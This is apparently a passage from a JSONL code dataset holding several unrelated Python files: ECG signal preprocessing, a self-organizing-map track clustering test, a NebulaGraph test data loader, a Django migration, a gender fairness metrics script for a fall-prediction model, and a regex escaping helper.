record[0]\n    channel = data[:, chid]\n\n    # Plot only the first 2000 samples\n    howmany = 2000\n\n    # Extract all of the annotation related information\n    where = annotation.sample < howmany\n    samp = annotation.sample[where]\n\n    # Convert to numpy.array to get fancy indexing access\n    types = np.array(annotation.symbol)\n    types = types[where]\n\n    # Calculate time values in seconds\n    times = np.arange(howmany, dtype='float') / annotation.fs\n    plt.plot(times, channel[: howmany])\n    
plt.xlabel('Time [s]')\n\n # Prepare qrs information for the plot\n qrs_times = times[samp]\n\n # Scale to show markers at the top\n qrs_values = np.ones_like(qrs_times)\n qrs_values *= channel.max() * 1.4\n\n # Also show annotation code\n # And their words\n for it, sam in enumerate(samp):\n # Get the annotation position\n xa = times[sam]\n ya = channel.max() * 0.5\n\n # Use just the first letter\n a_txt = types[it]\n plt.annotate(a_txt, xy=(xa, ya))\n\n plt.show()\n\n\ndef Ica_impl(X):\n # ica = FastICA(n_components=3)\n ica = FastICA()\n S_ = ica.fit_transform(X) # Reconstruct signals\n\n # Plot results\n\n plt.figure()\n\n models = [X, S_]\n names = ['Observations (mixed signal)',\n 'ICA recovered signals']\n colors = ['red', 'steelblue', 'orange']\n\n for ii, (model, name) in enumerate(zip(models, names), 1):\n plt.subplot(2, 1, ii)\n plt.title(name)\n for sig, color in zip(model.T, colors):\n plt.plot(sig, color=color)\n\n plt.subplots_adjust(0.09, 0.04, 0.94, 0.94, 0.26, 0.46)\n\n plt.show()\n\n\ndef beat_annotations(annotation):\n \"\"\" Get rid of non-beat markers \"\"\"\n # Declare beat types\n good = ['N', 'L', 'R', 'B', 'A', 'a', 'J', 'S', 'V', 'r', 'F', 'e', 'j', 'n', 'E', '/', 'f', 'Q', '?']\n ids = np.in1d(annotation.symbol, good)\n\n # We want to know only the positions\n beats = annotation.sample[ids]\n\n return beats\n\n\ndef convert_input(channel, annotation):\n \"\"\" Into output \"\"\"\n # Remove non-beat annotations\n beats = beat_annotations(annotation)\n\n # Create dirac-comb signal\n dirac = np.zeros_like(channel)\n dirac[beats] = 1.0\n\n # Use hamming window as a bell-curve filter\n width = 36\n kernel = signal.hamming(width)\n gauss = np.convolve(kernel, dirac, mode='same')\n\n return dirac, gauss\n\n\ndef convert_data(data, annotations, width):\n \"\"\" Into a batch \"\"\"\n # Prepare containers\n signals, labels = [], []\n\n # Convert both channels\n for it in range(2):\n channel = data[:, it]\n dirac, gauss = convert_input(channel, annotations)\n # Merge labels\n label = np.vstack([dirac, gauss])\n\n # Prepare the moving window\n sta = 0\n end = width\n stride = width\n while end <= len(channel):\n # Chop out the fragments\n s_frag = channel[sta: end]\n l_frag = label[:, sta: end]\n\n # Cumulate\n signals.append(s_frag)\n labels.append(l_frag)\n\n # Go forth\n sta += stride\n end += stride\n\n # Turn into arrays\n signals = np.array(signals)\n labels = np.array(labels)\n\n return signals, labels\n\n\n# records = paths\ndef make_dataset(records, savepath):\n \"\"\" Inside an array \"\"\"\n # Prepare containers\n signals, labels = [], []\n\n # Iterate files\n for path in records:\n record = wf.rdsamp(path)\n annotations = wf.rdann(path, 'atr')\n\n # Extract pure signals\n data = record[0]\n\n # Convert each channel into labeled fragments\n signal, label = convert_data(data, annotations, 1000)\n\n # Cumulate\n\n signals.append(signal)\n labels.append(label)\n\n # Convert to numpy.array\n signals = np.array(signals)\n labels = np.array(labels)\n\n # Write to disk\n np.save(savepath + \"/signals\", signals)\n np.save(savepath + \"/labels\", labels)\n\n\ndef create_datasets(records):\n \"\"\" Training, validation, test \"\"\"\n\n # Shuffle up deterministically\n np.random.seed(666)\n np.random.shuffle(records)\n\n # Make training ...\n make_dataset(records[:30], 'data/training')\n\n # ... validation ...\n make_dataset(records[30: 39], 'data/validation')\n\n # ... 
and test\n    make_dataset(records[39: 48], 'data/test')\n\n\ndef next_batch(self, batch_size):\n    \"\"\" Iterate \"\"\"\n    # Go forth\n    start = self.index_in_epoch\n    self.index_in_epoch += batch_size\n\n    if self.index_in_epoch > self.nof_examples:\n        # Finished epoch\n        self.epochs_completed += 1\n        print('Data epochs done:', self.epochs_completed)\n\n        # Shuffle the data accessing iterators (again)\n        np.random.shuffle(self.ids)\n\n        # Start next epoch\n        start = 0\n        self.index_in_epoch = batch_size\n\n    end = self.index_in_epoch\n\n    # Get random row numbers\n    ids = self.ids[start: end]\n\n    signals = self.training_set['signals'][ids]\n    labels = self.training_set['labels'][ids]\n\n    return signals, labels\n\n\ndef getmodel(seqlength, features, dimout):\n    # Missing from the file header; tf.keras assumed from the tf.nn activations.\n    import tensorflow as tf\n    from tensorflow.keras.layers import Dense\n    from tensorflow.keras.models import Sequential\n    model = Sequential()\n    model.add(Dense(128, activation=tf.nn.relu))\n    model.add(Dense(2, activation=tf.nn.softmax))\n    return model\n\n\ndef MyFlatten(yyt):\n    # Stack every 2-D slice of yyt along axis 0, from the first slice to the last.\n    yyt1 = np.array(yyt[0, :, :])\n    for it in range(1, yyt.shape[0]):\n        yyt2 = np.array(yyt[it, :, :])\n        yyt1 = np.append(yyt1, yyt2, 0)\n    return yyt1\n","sub_path":"DataFun.py","file_name":"DataFun.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"153706370","text":"# For plotting the images\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nfrom SOM import SOM\r\nfrom AffinityPropogation import AffinityPropogation\r\nimport csv\r\n\r\nnum_tracks = 50 #1974\r\na = []\r\nb = []\r\ndataset = 'C:/Users/Bharat Bojja/Documents/Programming/SongClassification/FullDataSet.csv'\r\nreader = csv.reader(open(dataset, 'rt'), delimiter=',', quoting=csv.QUOTE_NONE)\r\nnext(reader)\r\ni = 0\r\naudio_features = []\r\ntrack_names = []\r\nfor row in reader:\r\n    audio_features.append(list(row[i] for i in range(7, 17)))\r\n    track_names.append(list(row[i] for i in range(6, 7)))\r\n    i += 1\r\n    if i == num_tracks:\r\n        break\r\n\r\n# Training inputs for tracks\r\naudio_features = np.asarray(audio_features, dtype=float)\r\n\r\n# Train a 20x30 SOM with 10 iterations\r\nsom = SOM(20, 30, 10, 50)\r\nsom.train(audio_features)\r\n\r\n# Get output grid\r\nimage_grid = som.get_centroids()\r\n\r\n# Map tracks to their closest neurons\r\nmapped = som.map_vects(audio_features)\r\n\r\n# Plot\r\nplt.imshow(image_grid[10])\r\nplt.title('Track SOM')\r\nplt.ylim([0,20])\r\nplt.xlim([0,30])\r\nfor i, m in enumerate(mapped):\r\n    plt.text(m[1], m[0], track_names[i], ha='center', va='center',\r\n             bbox=dict(facecolor='white', alpha=0.5, lw=0))\r\naff = AffinityPropogation(mapped)\r\nprint(track_names)\r\nplt.show()","sub_path":"SOM_Tester.py","file_name":"SOM_Tester.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"423687965","text":"# --coding:utf-8--\n#\n# Copyright (c) 2019 vesoft inc. 
All rights reserved.\n#\n# This source code is licensed under Apache 2.0 License,\n# attached with Common Clause Condition 1.0, found in the LICENSES directory.\n\n\nimport time\n\nfrom nebula2.Client import GraphClient\nfrom nebula2.ConnectionPool import ConnectionPool\nfrom nebula2.graph import ttypes\nfrom tests.common.configs import get_delay_time\n\n\nclass GlobalDataLoader(object):\n def __init__(self, data_dir, ip, port, user, password):\n self.data_dir = data_dir\n self.ip = ip\n self.port = port\n self.client_pool = ConnectionPool(ip=self.ip, port=self.port, network_timeout=0)\n self.client = GraphClient(self.client_pool)\n self.user = user\n self.password = password\n self.client.authenticate(self.user, self.password)\n\n def load_all_test_data(self):\n if self.client is None:\n assert False, 'Connect to {}:{}'.format(self.ip, self.port)\n self.load_nba()\n self.load_student()\n\n # The whole test will load once, for the only read tests\n def load_nba(self):\n nba_file = self.data_dir + '/data/nba.ngql'\n print(\"open: \", nba_file)\n with open(nba_file, 'r') as data_file:\n resp = self.client.execute(\n 'CREATE SPACE IF NOT EXISTS nba(partition_num=10, replica_factor=1, vid_type = fixed_string(30));USE nba;')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n lines = data_file.readlines()\n ddl = False\n ngql_statement = \"\"\n for line in lines:\n strip_line = line.strip()\n if len(strip_line) == 0:\n continue\n elif strip_line.startswith('--'):\n comment = strip_line[2:]\n if comment == 'DDL':\n ddl = True\n elif comment == 'END':\n if ddl:\n time.sleep(get_delay_time(self.client))\n ddl = False\n else:\n line = line.rstrip()\n ngql_statement += \" \" + line\n if line.endswith(';'):\n resp = self.client.execute(ngql_statement)\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n ngql_statement = \"\"\n\n # The whole test will load once, for the only read tests\n def load_student(self):\n resp = self.client.execute(\n 'CREATE SPACE IF NOT EXISTS student_space(partition_num=10, replica_factor=1, vid_type = fixed_string(8)); USE student_space;')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE TAG IF NOT EXISTS person(name string, age int, gender string);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE TAG IF NOT EXISTS teacher(grade int, subject string);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE TAG IF NOT EXISTS student(grade int, hobby string DEFAULT \"\");')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE EDGE IF NOT EXISTS is_schoolmate(start_year int, end_year int);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE EDGE IF NOT EXISTS is_teacher(start_year int, end_year int);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE EDGE IF NOT EXISTS is_friend(start_year int, intimacy double);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('CREATE EDGE IF NOT EXISTS is_colleagues(start_year int, end_year int);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n # TODO: update the time when config can use\n time.sleep(get_delay_time(self.client))\n\n resp = self.client.execute('INSERT 
VERTEX person(name, age, gender), teacher(grade, subject) VALUES \\\n \"2001\":(\"Mary\", 25, \"female\", 5, \"Math\"), \\\n \"2002\":(\"Ann\", 23, \"female\", 3, \"English\"), \\\n \"2003\":(\"Julie\", 33, \"female\", 6, \"Math\"), \\\n \"2004\":(\"Kim\", 30,\"male\", 5, \"English\"), \\\n \"2005\":(\"Ellen\", 27, \"male\", 4, \"Art\"), \\\n \"2006\":(\"ZhangKai\", 27, \"male\", 3, \"Chinese\"), \\\n \"2007\":(\"Emma\", 26, \"female\", 2, \"Science\"), \\\n \"2008\":(\"Ben\", 24, \"male\", 4, \"Music\"), \\\n \"2009\":(\"Helen\", 24, \"male\", 2, \"Sports\") ,\\\n \"2010\":(\"Lilan\", 32, \"male\", 5, \"Chinese\");')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('INSERT VERTEX person(name, age, gender), student(grade) VALUES \\\n \"1001\":(\"Anne\", 7, \"female\", 2), \\\n \"1002\":(\"Cynthia\", 7, \"female\", 2), \\\n \"1003\":(\"Jane\", 6, \"male\", 2), \\\n \"1004\":(\"Lisa\", 8, \"female\", 3), \\\n \"1005\":(\"Peggy\", 8, \"male\", 3), \\\n \"1006\":(\"Kevin\", 9, \"male\", 3), \\\n \"1007\":(\"WangLe\", 8, \"male\", 3), \\\n \"1008\":(\"WuXiao\", 9, \"male\", 4), \\\n \"1009\":(\"Sandy\", 9, \"female\", 4), \\\n \"1010\":(\"Harry\", 9, \"female\", 4), \\\n \"1011\":(\"Ada\", 8, \"female\", 4), \\\n \"1012\":(\"Lynn\", 9, \"female\", 5), \\\n \"1013\":(\"Bonnie\", 10, \"female\", 5), \\\n \"1014\":(\"Peter\", 10, \"male\", 5), \\\n \"1015\":(\"Carl\", 10, \"female\", 5), \\\n \"1016\":(\"Sonya\", 11, \"male\", 6), \\\n \"1017\":(\"HeNa\", 11, \"female\", 6), \\\n \"1018\":(\"Tom\", 12, \"male\", 6), \\\n \"1019\":(\"XiaMei\", 11, \"female\", 6), \\\n \"1020\":(\"Lily\", 10, \"female\", 6);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('INSERT EDGE is_schoolmate(start_year, end_year) VALUES \\\n \"1001\" -> \"1002\":(2018, 2019), \\\n \"1001\" -> \"1003\":(2017, 2019), \\\n \"1002\" -> \"1003\":(2017, 2018), \\\n \"1002\" -> \"1001\":(2018, 2019), \\\n \"1004\" -> \"1005\":(2016, 2019), \\\n \"1004\" -> \"1006\":(2017, 2019), \\\n \"1004\" -> \"1007\":(2016, 2018), \\\n \"1005\" -> \"1004\":(2017, 2018), \\\n \"1005\" -> \"1007\":(2017, 2018), \\\n \"1006\" -> \"1004\":(2017, 2018), \\\n \"1006\" -> \"1007\":(2018, 2019), \\\n \"1008\" -> \"1009\":(2015, 2019), \\\n \"1008\" -> \"1010\":(2017, 2019), \\\n \"1008\" -> \"1011\":(2018, 2019), \\\n \"1010\" -> \"1008\":(2017, 2018), \\\n \"1011\" -> \"1008\":(2018, 2019), \\\n \"1012\" -> \"1013\":(2015, 2019), \\\n \"1012\" -> \"1014\":(2017, 2019), \\\n \"1012\" -> \"1015\":(2018, 2019), \\\n \"1013\" -> \"1012\":(2017, 2018), \\\n \"1014\" -> \"1015\":(2018, 2019), \\\n \"1016\" -> \"1017\":(2015, 2019), \\\n \"1016\" -> \"1018\":(2014, 2019), \\\n \"1018\" -> \"1019\":(2018, 2019), \\\n \"1017\" -> \"1020\":(2013, 2018), \\\n \"1017\" -> \"1016\":(2018, 2019);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('INSERT EDGE is_friend(start_year, intimacy) VALUES \\\n \"1003\" -> \"1004\":(2017, 80.0), \\\n \"1013\" -> \"1007\":(2018, 80.0), \\\n \"1016\" -> \"1008\":(2015, 80.0), \\\n \"1016\" -> \"1018\":(2014, 85.0), \\\n \"1017\" -> \"1020\":(2018, 78.0), \\\n \"1018\" -> \"1016\":(2013, 83.0), \\\n \"1018\" -> \"1020\":(2018, 88.0);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('INSERT EDGE is_colleagues(start_year, end_year) VALUES \\\n \"2001\" -> \"2002\":(2015, 0), \\\n \"2001\" -> \"2007\":(2014, 0), \\\n 
\"2001\" -> \"2003\":(2018, 0), \\\n \"2003\" -> \"2004\":(2013, 2017), \\\n \"2002\" -> \"2001\":(2016, 2017), \\\n \"2007\" -> \"2001\":(2013, 2018), \\\n \"2010\" -> \"2008\":(2018, 0);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n resp = self.client.execute('INSERT EDGE is_teacher(start_year, end_year) VALUES \\\n \"2002\" -> \"1004\":(2018, 2019), \\\n \"2002\" -> \"1005\":(2018, 2019), \\\n \"2002\" -> \"1006\":(2018, 2019), \\\n \"2002\" -> \"1007\":(2018, 2019), \\\n \"2002\" -> \"1009\":(2017, 2018), \\\n \"2002\" -> \"1012\":(2015, 2016), \\\n \"2002\" -> \"1013\":(2015, 2016), \\\n \"2002\" -> \"1014\":(2015, 2016), \\\n \"2002\" -> \"1019\":(2014, 2015), \\\n \"2010\" -> \"1016\":(2018,2019), \\\n \"2006\" -> \"1008\":(2017, 2018);')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n\n def drop_data(self):\n resp = self.client.execute('DROP SPACE nba; DROP SPACE student_space;')\n assert resp.error_code == ttypes.ErrorCode.SUCCEEDED, resp.error_msg\n self.client.sign_out()\n self.client_pool.close()\n","sub_path":"tests/common/global_data_loader.py","file_name":"global_data_loader.py","file_ext":"py","file_size_in_byte":10884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"324202798","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('BlogApp', '0008_auto_20150708_1514'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='slug_name',\n field=models.SlugField(default=datetime.datetime(2015, 7, 10, 7, 15, 17, 950542, tzinfo=utc)),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='comment',\n name='comment_text',\n field=models.TextField(max_length=200),\n ),\n ]\n","sub_path":"BlogProject/BlogApp/migrations/0009_auto_20150710_1015.py","file_name":"0009_auto_20150710_1015.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"400853639","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom utils_Copy import *\n\n\n# In[2]:\n\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn')\nimport numpy as np\n\n\n# In[3]:\n\n\n#PATH=\"/content/drive/My Drive/Kandidat speciale/500 - Notebooks/models/all races_CV50/\"\n\n\n#### AIR ### \n\nAIR=True\nfile_name=\"Fall_count_clusterOHE_std.csv\"\nfull_file_path=\"/restricted/s164512/G2020-57-Aalborg-bias/data_air/\"+file_name\n\n\n#titel_mitigation=\"TestCorrect9juni_strat\"\n#titel_mitigation=\"test25may200ep\"\n#save_to_folder=\"test\"\n\n\n\n#titel_mitigation=\"original\"\n#titel_mitigation=\"DroppingD\"\n#titel_mitigation=\"Gender Swap\"\n#titel_mitigation=\"DI remove\"\n#titel_mitigation=\"LFR\"\ntitel_mitigation=\"DI remove no gender\"\nPATH_orig=\"/restricted/s164512/G2020-57-Aalborg-bias/lau/FFNN_ohe/models/\"+titel_mitigation+\"/\"\n\n\n\n#save_to_folder=\"original\"\n#save_to_folder=\"Dropping D\"\n#save_to_folder=\"Gender Swap\"\n#save_to_folder=\"DI remove\"\n#save_to_folder=\"LFR\"\nsave_to_folder=\"DI remove no 
gender\"\n\n\ny_col_name=\"Fall\"\nX_col_names=['Gender',\n'BirthYear',\n'LoanPeriod',\n'NumberAts',\n'Ats_Polstring',\n'Ats_Mobilitystokke',\n'Ats_Belysning',\n'Ats_Underlag',\n'Ats_ToiletforhøjereStativ',\n'Ats_Signalgivere',\n'Ats_EldrevneKørestole',\n'Ats_Forstørrelsesglas',\n'Ats_Nødalarmsystemer',\n'Ats_MobilePersonløftere',\n'Ats_TrappelifteMedPlatforme',\n'Ats_Badekarsbrætter',\n'Ats_Albuestokke',\n'Ats_MaterialerOgRedskaberTilAfmærkning',\n'Ats_Ryglæn',\n#'Ats_0',\n'Ats_GanghjælpemidlerStøtteTilbehør',\n'Ats_Støttebøjler',\n'Ats_Lejringspuder',\n'Ats_Strømpepåtagere',\n'Ats_Dørtrin',\n'Ats_Spil',\n'Ats_BordePåStole',\n'Ats_Drejeskiver',\n'Ats_Toiletstole',\n'Ats_LøftereStationære',\n'Ats_Madmålingshjælpemidler',\n'Ats_Fodbeskyttelse',\n'Ats_Ståløftere',\n'Ats_Stole',\n'Ats_Sengeborde',\n'Ats_Toiletter',\n'Ats_ToiletforhøjereFaste',\n'Ats_Påklædning',\n'Ats_Brusere',\n'Ats_VævsskadeLiggende',\n'Ats_Døråbnere',\n'Ats_ServeringAfMad',\n'Ats_TrappelifteMedSæder',\n'Ats_SæderTilMotorkøretøjer',\n'Ats_KørestoleManuelleHjælper',\n'Ats_Gangbukke',\n'Ats_Rollatorer',\n'Ats_TryksårsforebyggendeSidde',\n'Ats_Fastnettelefoner',\n'Ats_Bækkener',\n'Ats_Vendehjælpemidler',\n'Ats_Sanseintegration',\n'Ats_Kørestolsbeskyttere',\n'Ats_Arbejdsstole',\n'Ats_Løftesejl',\n'Ats_KørestoleForbrændingsmotor',\n'Ats_Løftestropper',\n'Ats_Stiger',\n'Ats_TransportTrapper',\n'Ats_DrivaggregaterKørestole',\n'Ats_Emballageåbnere',\n'Ats_ToiletforhøjereLøse',\n'Ats_Hårvask',\n'Ats_PersonløftereStationære',\n'Ats_Madrasser',\n'Ats_Vinduesåbnere',\n'Ats_Læsestativer',\n'Ats_KørestoleManuelleDrivringe',\n'Ats_Sædepuder',\n'Ats_UdstyrCykler',\n'Ats_Karkludsvridere',\n'Ats_Vaskeklude',\n'Ats_Sengeudstyr',\n'Ats_Madlavningshjælpemidler',\n'Ats_Skohorn',\n'Ats_GribetængerManuelle',\n'Ats_Hvilestole',\n'Ats_EldrevneKørestoleStyring',\n'Ats_BærehjælpemidlerTilKørestole',\n'Ats_LøftegalgerSeng',\n'Ats_Høreforstærkere',\n'Ats_Kalendere',\n'Ats_Stokke',\n'Ats_Løftegalger',\n'Ats_Ure',\n'Ats_StøttegrebFlytbare',\n'Ats_Forflytningsplatforme',\n'Ats_RamperFaste',\n'Ats_Rygehjælpemidler',\n'Ats_Personvægte',\n'Ats_Manøvreringshjælpemidler',\n'Ats_Overtøj',\n'Ats_Lydoptagelse',\n'Ats_Gangborde',\n'Ats_Ståstøttestole',\n'Ats_RamperMobile',\n'Ats_Bærehjælpemidler',\n'Ats_Badekarssæder',\n'Ats_Siddemodulsystemer',\n'Ats_Videosystemer',\n'Ats_Siddepuder',\n'Ats_Sengeheste',\n'Ats_Stolerygge',\n'Ats_Rulleborde',\n'Ats_Sengeforlængere',\n'Ats_Madningsudstyr',\n'Ats_Brusestole',\n'Ats_Flerpunktsstokke',\n'Ats_SengebundeMedMotor',\n'Ats_Cykler',\n'Ats_CykelenhederKørestole',\n'Ats_Stokkeholdere',\n'Ats_Toiletarmstøtter',\n'Ats_Coxitstole',\n'Ats_Toiletsæder',\n'Ats_Rebstiger',\n'Ats_Forhøjerklodser',\n'Cluster_0',\n'Cluster_1',\n'Cluster_2',\n'Cluster_3',\n'Cluster_4',\n'Cluster_5',\n'Cluster_6',\n'Cluster_7',\n'Cluster_8',\n'Cluster_9',\n'Cluster_10',\n'Cluster_11',\n'Cluster_12',\n'Cluster_13',\n'Cluster_14',\n'Cluster_15',\n'Cluster_16',\n'Cluster_17',\n'Cluster_18',\n'Cluster_19']\n#X_col_names = [col for col in X_col_names if col not in leave_out ]\n\nprocted_col_name=\"Gender\"\n\noutput_col_name=\"output\"\n\noutput_prob_col_name=\"output_prob\"\n\n\n###### COMPASS ####\n\n#AIR=False\n\n#titel_mitigation=\"testCOMPASS\"\n#PATH_orig=\"/restricted/s164512/G2020-57-Aalborg-bias/lau/FFNN/models/\"+titel_mitigation+\"/\"\n\n#full_file_path = 'https://raw.githubusercontent.com/propublica/compas-analysis/master/compas-scores-two-years.csv'\n\n#y_col_name=\"is_recid\"\n#X_col_names=['remember_index','sex','age','race', 
'juv_fel_count','juv_misd_count','juv_other_count','priors_count',\"c_charge_desc\",\"c_charge_degree\"]\n\n#procted_col_name=\"race\"\n\n\n# In[4]:\n\n\n#n_feat=len(X_col_names)\n#output_dim=1 #binary\n\n\n# In[ ]:\n\n\n\n\n\n# # Move testdata (obs-level) to correct folder (to plotting)\n\n# In[5]:\n\n\n#save_to_folder=\"original\"\n#save_to_folder=\"Dropping D\"\n\n\n# In[6]:\n\n\ntdata_move=pd.read_csv(PATH_orig+\"/all_test_data_localmodel.csv\")\ntdata_move.to_csv(f\"/restricted/s164512/G2020-57-Aalborg-bias/Plot_metrics/{save_to_folder}/FFNN_gender_obs.csv\")\n\n\n# # Collect confusion metrics for all 50 FFNN datamodels, and save to plotting\n\n# In[7]:\n\n\ndf2_copy=tdata_move.copy()\n\n\n# In[8]:\n\n\n\nmetrics_frame_gender=pd.DataFrame([],columns=[\"Gender\",\"TPR\",\"FPR\",\"TNR\",\"FNR\",\"ACC\",\"Mean_y_hat\",\"Mean_y_target\",\"Mean_y_hat_prob\"])\n\nfor modelnr in df2_copy[\"Model\"].unique():\n\n metrics_frame_sub_gender=get_df_w_metrics(df2_copy[df2_copy[\"Model\"]==modelnr],procted_col_name,y_col_name,output_col_name,output_prob_col_name).sort_values([\"Gender\"])[[\"Gender\",\"TPR\",\"FPR\",\"TNR\",\"FNR\",\"ACC\",\"Mean_y_hat\",\"Mean_y_target\",\"Mean_y_hat_prob\"]]#*100\n \n \n \n \n \n \n metrics_frame_gender= pd.concat([metrics_frame_gender,metrics_frame_sub_gender\n \n ],sort=False,axis=0)\n\n\n# In[9]:\n\n\nmetrics_frame_gender_to_plot=metrics_frame_gender.copy()\nmetrics_frame_gender_to_plot[\"Model\"]=\"FFNN\"\nmetrics_frame_gender_to_plot.to_csv(f\"/restricted/s164512/G2020-57-Aalborg-bias/Plot_metrics/{save_to_folder}/FFNN_gender.csv\")\n\n\n# In[10]:\n\n\nprint(\"This should be 100:\",metrics_frame_gender_to_plot.shape[0])\n\n\n# # GeCI intervals\n\n# In[11]:\n\n\nimport scipy.stats as st\n\nfor gender in metrics_frame_gender[\"Gender\"].unique():\n string_new2=str(gender)\n string_new=\" \"\n for col in [\"TPR\",\"FPR\",\"TNR\",\"FNR\"]:#,\"ACC\"]:\n string_new=string_new+\" & \"\n string_new2=string_new2+\" & \"\n \n \n data=metrics_frame_gender[(metrics_frame_gender[\"Gender\"]==gender)][col]\n m=np.mean(data)\n (slow,shigh) =st.t.interval(alpha=0.95, df=len(data)-1, loc=np.mean(data), scale=st.sem(data)) \n\n \n #print(f\"{col} for {gender} is: mean {round(m*100,2)} ({round(slow*100,2)},{round(shigh*100,2)})\")\n string_new2=string_new2+\"\\\\textbf{\"+f\"{round(m*100,1)}\"+ \"}\"\n string_new=string_new+f\"({round(slow*100,1)}-{round(shigh*100,1)})\" \n \n print(string_new2)\n print(string_new)\n \n\n\n# # Calculate total\n\n# In[12]:\n\n\ndf2_copy[\"Total\"]=\"Total\"\n\n\nmetrics_frame_all=pd.DataFrame([],columns=[\"Total\",\"TPR\",\"FPR\",\"TNR\",\"FNR\",\"ACC\",\"Mean_y_hat\",\"Mean_y_target\",\"Mean_y_hat_prob\"])\n\nfor modelnr in df2_copy[\"Model\"].unique():\n\n metrics_frame_sub_all=get_df_w_metrics(df2_copy[df2_copy[\"Model\"]==modelnr],\"Total\",y_col_name,output_col_name,output_prob_col_name).sort_values([\"Total\"])[[\"Total\",\"TPR\",\"FPR\",\"TNR\",\"FNR\",\"ACC\",\"Mean_y_hat\",\"Mean_y_target\",\"Mean_y_hat_prob\"]]#*100\n \n \n \n \n \n \n metrics_frame_all= pd.concat([metrics_frame_all,metrics_frame_sub_all\n \n ],sort=False,axis=0)\n\n\n# In[13]:\n\n\nmetrics_frame_all_to_plot=metrics_frame_all.copy()\nmetrics_frame_all_to_plot[\"Model\"]=\"FFNN\"\nmetrics_frame_all_to_plot.to_csv(f\"/restricted/s164512/G2020-57-Aalborg-bias/Plot_metrics/{save_to_folder}/FFNN_all.csv\")\n\n\n# In[14]:\n\n\nprint(\"This should be 50:\",metrics_frame_all_to_plot.shape[0])\n\n\n# # Print ACC\n\n# In[17]:\n\n\nimport scipy.stats as st\n\nfor gender in 
metrics_frame_all[\"Total\"].unique():\n string_new2=str(gender)\n string_new=\" \"\n for col in [\"ACC\"]:#[\"TPR\",\"FPR\",\"TNR\",\"FNR\",\"ACC\"]:\n string_new=string_new+\" & \"\n string_new2=string_new2+\" & \"\n \n \n data=metrics_frame_all[(metrics_frame_all[\"Total\"]==gender)][col]\n m=np.mean(data)\n (slow,shigh) =st.t.interval(alpha=0.95, df=len(data)-1, loc=np.mean(data), scale=st.sem(data)) \n\n \n #print(f\"{col} for {gender} is: mean {round(m*100,2)} ({round(slow*100,2)},{round(shigh*100,2)})\")\n string_new2=string_new2+\"\\\\textbf{\"+f\"{round(m*100,1)}\"+ \"}\"\n string_new=string_new+f\"({round(slow*100,1)}-{round(shigh*100,1)})\" \n \n print(string_new2+\" \\\\\\ \")\n print(string_new+\" \\\\\\ \")\n \n\n\n# In[18]:\n\n\nimport scipy.stats as st\n\nfor gender in metrics_frame_gender[\"Gender\"].unique():\n string_new2=str(gender)\n string_new=\" \"\n for col in [\"ACC\"]:\n string_new=string_new+\" & \"\n string_new2=string_new2+\" & \"\n \n \n data=metrics_frame_gender[(metrics_frame_gender[\"Gender\"]==gender)][col]\n m=np.mean(data)\n (slow,shigh) =st.t.interval(alpha=0.95, df=len(data)-1, loc=np.mean(data), scale=st.sem(data)) \n\n \n #print(f\"{col} for {gender} is: mean {round(m*100,2)} ({round(slow*100,2)},{round(shigh*100,2)})\")\n string_new2=string_new2+\"\\\\textbf{\"+f\"{round(m*100,1)}\"+ \"}\"\n string_new=string_new+f\"({round(slow*100,1)}-{round(shigh*100,1)})\" \n \n print(string_new2+\" \\\\\\ \")\n print(string_new+\" \\\\\\ \")\n \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Legacy/Lau/FFNN_ohe/Get metrics ohe.py","file_name":"Get metrics ohe.py","file_ext":"py","file_size_in_byte":9560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594716311","text":"import re\n\nclass SpecialCharacters :\n global regex\n regex = re.compile('[@_!#$%^&()<>/\\|}{~]')\n\n def checkSpecialCharacter(self, text):\n global regex\n if regex.search(text) != None:\n specialChar = regex.search(text).group(0)\n text = text.replace(specialChar, f'\\{specialChar}')\n return 